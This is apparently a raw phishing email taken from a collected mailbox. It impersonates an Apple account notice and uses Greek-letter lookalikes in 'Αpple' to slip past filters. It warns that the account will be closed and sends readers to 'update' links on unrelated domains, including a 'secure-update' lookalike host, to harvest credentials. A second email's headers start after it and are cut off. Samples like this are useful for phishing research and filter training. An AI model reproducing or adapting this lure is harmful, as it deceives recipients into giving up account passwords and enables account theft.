From: Apple <localhost@eua9.servidoreua9.srv.br>
Message-Id: <E1dELPU-003xas-Re@eua9.servidoreua9.srv.br>
Date: Fri, 26 May 2017 17:00:32 -0300
X-AntiAbuse: This header was added to track abuse, please include it with any abuse report
X-AntiAbuse: Primary Hostname - eua9.servidoreua9.srv.br
X-AntiAbuse: Original Domain - monkey.org
X-AntiAbuse: Originator/Caller UID/GID - [2247 499] / [47 12]
X-AntiAbuse: Sender Address Domain - eua9.servidoreua9.srv.br
X-Get-Message-Sender-Via: eua9.servidoreua9.srv.br: authenticated_id: djbetoan/primary_hostname/system user
X-Authenticated-Sender: eua9.servidoreua9.srv.br: djbetoan
X-Source: 
X-Source-Args: /usr/sbin/proxyexec -q -d -s /var/lib/proxyexec/cagefs.sock/socket /bin/cagefs.server 
X-Source-Dir: djbetoandrade.com.br:/public_html
Status: RO
X-Status: 
X-Keywords:                 
X-UID: 199


<html>

<head>
<meta http-equiv="Content-Language" content="fr">
<meta http-equiv="Content-Type" content="text/html; charset=windows-1252">
<title>Confirm your Account</title>
</head>

<body>

<div bgcolor="#cccccc" style="color: rgb(34, 34, 34); font-family: arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; margin: 0px; padding: 0px; background-color: rgb(255, 255, 255)">
	<table align="center" cellspacing="0" cellpadding="0" bgcolor="#cccccc" width="100%">
		<tr>
			<td style="font-family: arial, sans-serif; margin: 0px; padding: 20px">
			<table bgcolor="#ffffff" cellpadding="0" cellspacing="0" border="0" align="center" width="560" style="margin: 0px auto">
				<tr>
					<td colspan="2" style="font-family: arial, sans-serif; margin: 0px">
					<img border="0" height="10" width="560" alt="" src="https://ci3.googleusercontent.com/proxy/99kcBkLiGUOKkrmbv4zjPp7DmJZTrpWzNDnOyaxIR5SXvg0Okz1xc2_5zTXNIHlm_tCYThmlzv0Dh8W8enWBzzWmFo27ga0=s0-d-e1-ft#http://images.apple.com/cbx/us/10/0553Z/i/top.gif" style="display: block; margin: 0px"></td>
				</tr>
				<tr>
					<td width="508" style="font-family: arial, sans-serif; margin: 0px">
					<table cellpadding="0" cellspacing="0" border="0" width="508">
						<tr>
							<td align="left" style="font-family: arial, sans-serif; margin: 0px; padding-left: 30px; padding-right: 27px; padding-top: 36px; padding-bottom: 0px">
							<div style="font-family: 'Lucida Grande', 'Lucida Sans', 'Lucida Sans Unicode', Arial, Helvetica, Verdana, sans-serif; font-size: 18px; color: rgb(102, 102, 102); line-height: 1em">
								<span style="color: rgb(102, 102, 102); font-family: 'Lucida Grande', 'Lucida Sans', 'Lucida Sans Unicode', Arial, Helvetica, Verdana, sans-serif; font-size: 18px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: -webkit-left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: rgb(255, 255, 255)">
								Confirm your Apple Account.</span></div>
							</td>
						</tr>
					</table>
					</td>
					<td align="right" width="52" style="font-family: arial, sans-serif; margin: 0px">
					<table cellpadding="0" cellspacing="0" border="0" width="52">
						<tr>
							<td align="left" style="font-family: arial, sans-serif; margin: 0px; padding-left: 0px; padding-right: 30px; padding-top: 32px; padding-bottom: 0px">
							<img border="0" height="23" width="22" alt="" src="https://ci4.googleusercontent.com/proxy/W6OV3KZEcFlnXoJtVENFMkJQZJff84uWfkZaxoDXCOoryD76R8cL3R3oO9X_1tlB2ROElnIC0CJafWwvnY7i7TgfYlv8MNhaUu-sEf4=s0-d-e1-ft#http://images.apple.com/cbx/us/10/0553Z/i/applelogo.gif" style="display: block; margin: 0px; padding-bottom: 3px"></td>
						</tr>
					</table>
					</td>
				</tr>
				<tr>
					<td colspan="2" height="24" style="font-family: arial, sans-serif; margin: 0px">&nbsp;</td>
				</tr>
				<tr>
					<td colspan="2" style="font-family: arial, sans-serif; margin: 0px">
					<table cellpadding="0" cellspacing="0" border="0" width="560">
						<tr>
							<td align="left" style="font-family: arial, sans-serif; margin: 0px; padding-left: 30px; padding-right: 30px; padding-top: 0px; padding-bottom: 0px">
							<div style="font-family: 'Lucida Grande', 'Lucida Sans', 'Lucida Sans Unicode', Arial, Helvetica, Verdana, sans-serif; font-size: 12px; color: rgb(102, 102, 102); line-height: 1.4em">
								<span style="color: rgb(102, 102, 102); font-family: 'Lucida Grande', 'Lucida Sans', 'Lucida Sans Unicode', Arial, Helvetica, Verdana, sans-serif; font-size: 12px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 16.799999237060547px; orphans: auto; text-align: -webkit-left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: rgb(255, 255, 255)">
								Dear member,</span></div>
							</td>
						</tr>
					</table>
					</td>
				</tr>
				<tr>
					<td colspan="2" height="24" style="font-family: arial, sans-serif; margin: 0px">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
					<table align="center" bgcolor="#ffffff" border="0" cellpadding="0" cellspacing="0" width="560" style="color: rgb(34, 34, 34); font-family: arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; margin: 0px auto">
						<tr>
							<td colspan="2" style="font-family: arial, sans-serif; margin: 0px">
							<table border="0" cellpadding="0" cellspacing="0" width="560">
								<tr>
									<td align="left" style="font-family: arial, sans-serif; margin: 0px; padding-left: 30px; padding-right: 30px; padding-top: 0px; padding-bottom: 0px">
									<div style="font-family: 'Lucida Grande', 'Lucida Sans', 'Lucida Sans Unicode', Arial, Helvetica, Verdana, sans-serif; font-size: 12px; color: rgb(102, 102, 102); line-height: 1.4em">
										We have faced some problems with your 
										account, please click the link below to reactive your account, If 
										you do not update it will be Closed.</div>
									</td>
								</tr>
							</table>
							</td>
						</tr>
						<tr>
							<td colspan="2" height="1" style="font-family: arial, sans-serif; margin: 0px">
							</td>
						</tr>
						<tr>
							<td colspan="2" style="font-family: arial, sans-serif; margin: 0px">
							<table border="0" cellpadding="0" cellspacing="0" width="560">
								<tr>
									<td align="left" style="font-family: arial, sans-serif; margin: 0px; padding-left: 30px; padding-right: 30px; padding-top: 0px; padding-bottom: 0px">
									<div style="font-family: 'Lucida Grande', 'Lucida Sans', 'Lucida Sans Unicode', Arial, Helvetica, Verdana, sans-serif; font-size: 12px; color: rgb(102, 102, 102); line-height: 1.4em">
										To update your account, just confirm 
										your informations, It's easy:<p style="margin-left: 40px">
										<strong>
										<a target="_blank" style="color: rgb(17, 85, 204)" href="https://www.hostalitegroup.com/notice/">
										Click Here to Update</a></strong></div>
									</td>
								</tr>
							</table>
							</td>
						</tr>
					</table>
					</td>
				</tr>
				<tr>
					<td colspan="2" style="font-family: arial, sans-serif; margin: 0px">
					<table cellpadding="0" cellspacing="0" border="0" width="560">
						<tr>
							<td align="left" style="font-family: arial, sans-serif; margin: 0px; padding-left: 30px; padding-right: 30px; padding-top: 0px; padding-bottom: 0px">
							<div style="font-family: 'Lucida Grande', 'Lucida Sans', 'Lucida Sans Unicode', Arial, Helvetica, Verdana, sans-serif; font-size: 12px; color: rgb(102, 102, 102); line-height: 1.4em">
								You can use your &Alpha;pple ID to; shop the iTunes 
								Store, buy from the &Alpha;pple 0nline Store, make a 
								reservation at an &Alpha;pple Retail Store, and access 
								&Alpha;pple support.<a target="_blank" style="color: rgb(0, 136, 204); text-decoration: none" href="https://www.hostalitegroup.com/notice/">Learn 
								more about your new &Alpha;pple ID</a>.</div>
							</td>
						</tr>
					</table>
					</td>
				</tr>
				<tr>
					<td colspan="2" height="24" style="font-family: arial, sans-serif; margin: 0px">&nbsp;</td>
				</tr>
				<tr>
					<td colspan="2" style="font-family: arial, sans-serif; margin: 0px">
					<table cellpadding="0" cellspacing="0" border="0" width="560">
						<tr>
							<td align="left" style="font-family: arial, sans-serif; margin: 0px; padding-left: 30px; padding-right: 30px; padding-top: 0px; padding-bottom: 0px">
							<div style="font-family: 'Lucida Grande', 'Lucida Sans', 'Lucida Sans Unicode', Arial, Helvetica, Verdana, sans-serif; font-size: 12px; color: rgb(102, 102, 102); line-height: 1.4em">
								To edit the personal information associated with 
								your &Alpha;pple ID, please<span class="Apple-converted-space">&nbsp;</span><a target="_blank" style="color: rgb(0, 136, 204); text-decoration: none" href="https://www.hostalitegroup.com/notice/">visit 
								the My &Alpha;pple ID website</a><span class="Apple-converted-space">&nbsp;</span>and 
								sign in with your &Alpha;pple ID and password. To 
								learn how &Alpha;pple collects, uses, and safeguards 
								the personal information you provide, please 
								review the<span class="Apple-converted-space">&nbsp;</span><a target="_blank" style="color: rgb(0, 136, 204); text-decoration: none" href="https://www.hostalitegroup.com/notice/">&Alpha;pple 
								Customer Privacy Policy</a>.</div>
							</td>
						</tr>
					</table>
					</td>
				</tr>
				<tr>
					<td colspan="2" style="font-family: arial, sans-serif; margin: 0px; padding-top: 11px">
					<img alt="" border="0" height="10" width="560" src="https://ci4.googleusercontent.com/proxy/2I5etwaOUj2joPbgKM-q6THfZQjv1z-jKaCmMkJcGkEjkUvBCl12kyIHcXvtAI1HMrArUn2IF89WWJ_Eceo3ASKNcrW-7nxAKY8=s0-d-e1-ft#http://images.apple.com/cbx/us/10/0553Z/i/bottom.gif" style="display: block; margin: 0px"></td>
				</tr>
			</table>
			<table align="center" cellpadding="0" cellspacing="0" border="0" width="500" style="font-size: 9px; line-height: 1.4em; margin: 0px auto">
				<tr>
					<td align="left" style="font-family: arial, sans-serif; margin: 0px; padding-top: 20px">
					<div style="font-family: Geneva, Verdana, Arial, Helvetica, sans-serif; color: rgb(153, 153, 153)">
						TM and copyright © 2017 Apple Inc. 1 Infinite Loop, MS 
						83-DM, Cupertino, C&Alpha; 95014.<br>
						<a target="_blank" style="color: rgb(153, 153, 153); text-decoration: underline; font-family: Geneva, Verdana, Arial, Helvetica, sans-serif; white-space: nowrap" href="#">
						All Rights Reserved</a><span class="Apple-converted-space">&nbsp;</span>/<span class="Apple-converted-space">&nbsp;</span><a target="_blank" style="color: rgb(153, 153, 153); text-decoration: underline; font-family: Geneva, Verdana, Arial, Helvetica, sans-serif; white-space: nowrap" href="http://redirecting.support.secure-update.manasamarthyadata.com/please-wait.php">Keep 
						Informed</a><span class="Apple-converted-space">&nbsp;</span>/<span class="Apple-converted-space">&nbsp;</span><a target="_blank" style="color: rgb(153, 153, 153); text-decoration: underline; font-family: Geneva, Verdana, Arial, Helvetica, sans-serif; white-space: nowrap" href="#">Privacy 
						Policy</a><span class="Apple-converted-space">&nbsp;</span>/<span class="Apple-converted-space">&nbsp;</span><a target="_blank" style="color: rgb(153, 153, 153); text-decoration: underline; font-family: Geneva, Verdana, Arial, Helvetica, sans-serif; white-space: nowrap" href="#">My 
						&Alpha;pple ID</a></div>
					</td>
				</tr>
			</table>
			</td>
		</tr>
	</table>
</div>
<href src="#" style="color: rgb(34, 34, 34); font-family: arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; background-color: rgb(255, 255, 255)"></body></html>

From jose@monkey.org Mon May 29 18:08:48 2017 +0000
Return-Path: prvs=1319da97dd=ndaklul@iom.int
Delivered-To: jose@monkey.org
X-FDA: 72893377536.01.alarm48_2f8a5cf25820d
X-Spam-Summary: 50,0,0,736490e13a1038a3,d41d8cd98f00b204,prvs=1319da97dd=ndaklul@iom.int,:ndaklul@iom.int,RULES_HIT:1:2:10:41:72:152:334:355:368:369:379:582:599:901:962:966:967:968:973:978:983:988:989:1152:1158:1189:1208:1212:1221:1260:1263:1313:1314:1345:1359:1381:1431:1433:1434:1436:1437:1516:1517:1518:1571:1575:1588:1589:1592:1594:1730:1776:1792:1801:2068:2069:2196:2198:2199:2200:2525:2527:2553:2561:2564:2682:2685:2859:2890:2892:2900:2915:2933:2937:2939:2942:2945:2947:2951:2954:3022:3138:3139:3140:3141:3142:3352:3657:3865:3866:3867:3868:3870:3871:3872:3873:3934:3936:3938:3941:3944:3947:3950:3953:3956:3959:4042:4049:4250:4321:4385:4552:4605:5007:6117:6119:6238:6248:6261:6650:6657:6669:6678:7602:8568:8583:8599:8603:8797:8957:9025:9121:9149:9165:9388:9979:10004:10234:11233:11257:11473:11656:11657:11658:11852:11855:11874:11914:12043:12050:12438:12519:12551:12555:12740:12812:12895:12986:13005:13006:13011:13012:13013:13014:13015:13016:13017:13018:13019:13139:13161:13163:13229:13892:1409
X-HE-Tag: alarm48_2f8a5cf25820d
X-Filterd-Recvd-Size: 12441
Received: from mnlsmtpgw02.iom.int (mnlmailgw.iom.int [202.173.4.102])
	by imf24.b.hostedemail.com (Postfix) with ESMTP
	for <jose@monkey.org>; Mon, 29 May 2017 18:08:45 +0000 (UTC)
Received: from MNLEXHUB01.as.iom.net (unknown [172.26.151.52]) by mnlsmtpgw02.iom.int with smtp
	(TLS: TLSv1/SSLv3,128bits,AES128-SHA)
	 id 3afb_1011_62d4a773_8347_4cee_aa5b_c68ce845778d;
	Tue, 30 May 2017 01:55:30 +0800
Received: from MNLEXMBX02.as.iom.net ([fe80::a57b:efa4:723b:ec5d]) by
 MNLEXHUB01.as.iom.net ([fe80::edc0:7471:bd0:1f55%14]) with mapi id
 14.02.0342.003; Tue, 30 May 2017 01:31:08 +0800
